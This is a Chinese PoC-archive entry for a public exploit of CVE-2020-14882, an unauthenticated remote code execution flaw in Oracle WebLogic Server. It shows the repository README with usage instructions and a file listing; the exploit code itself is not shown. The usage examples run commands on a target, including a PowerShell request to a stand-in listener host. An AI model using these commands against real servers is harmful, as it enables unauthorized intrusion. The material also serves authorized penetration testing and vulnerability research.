POC详情: 3c4ecf076e6785cbb96406c6e6387e7857febbb6

来源
关联漏洞
标题: Oracle WebLogic Server 安全漏洞 (CVE-2020-14882)
描述:Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 Oracle WebLogic Server 多版本的Oracle Fusion Middleware 存在安全漏洞,该漏洞使未经身份验证的攻击者可以通过HTTP访问网络,从而破坏Oracle WebLogic Server。 受影响产品及版本如下: 10.3.6.0.0版本, 12.1.
描述
This script allows for remote code execution (RCE) on Oracle WebLogic Server
介绍
# CVE-2020-14882
This script enables remote code execution (RCE) on Oracle WebLogic Server using an unauthenticated GET request. It exploits the vulnerability CVE-2020-14882. By executing arbitrary commands, an attacker can gain unauthorized access to the server.

## Exploit Details

- Exploit Title: Oracle WebLogic Server, Unauthenticated RCE via GET request
- Exploit Author: Danny Safaya
- CVE: CVE-2020-14882
- Vendor Homepage: [Oracle WebLogic Server](https://www.oracle.com/middleware/technologies/weblogic.html)
- Software Link: [Oracle Middleware Downloads](https://www.oracle.com/technetwork/middleware/downloads/index.html)
- More Info: [WebLogic RCE by only one GET request (CVE-2020-14882) analysis](https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf)

## Usage

Make sure you have Python 3 installed. To use this script, follow the steps below:

1. Open a terminal or command prompt.
2. Run the script using the following command:
    ```
    python3 exploit.py http(s)://target:7001 command
    ```
   Replace `http(s)://target:7001` with the target URL of the Oracle WebLogic Server, and `command` with the desired command to execute.
   
   **Example 1:**
   ```
   python3 exploit.py http(s)://target:7001 "nslookup your_Domain"
   ```
   This example executes the command `nslookup your_Domain` on the target server.
   
   **Example 2:**
   ```
   python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"
   ```
   This example executes the PowerShell command `Invoke-WebRequest -Uri http://your_listener` on the target server.

## Warning

**This script is intended for authorized penetration testing and security research purposes only.** Unauthorized use of this script to exploit systems without proper consent is illegal and may result in legal consequences. Use it at your own risk.

## Dependencies

This script requires the following dependencies:

- `requests`
- `urllib3`

Please ensure that these dependencies are installed before running the script.

---
文件快照

[4.0K] /data/pocs/3c4ecf076e6785cbb96406c6e6387e7857febbb6 ├── [ 34K] LICENSE ├── [1.0K] main.py └── [2.0K] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。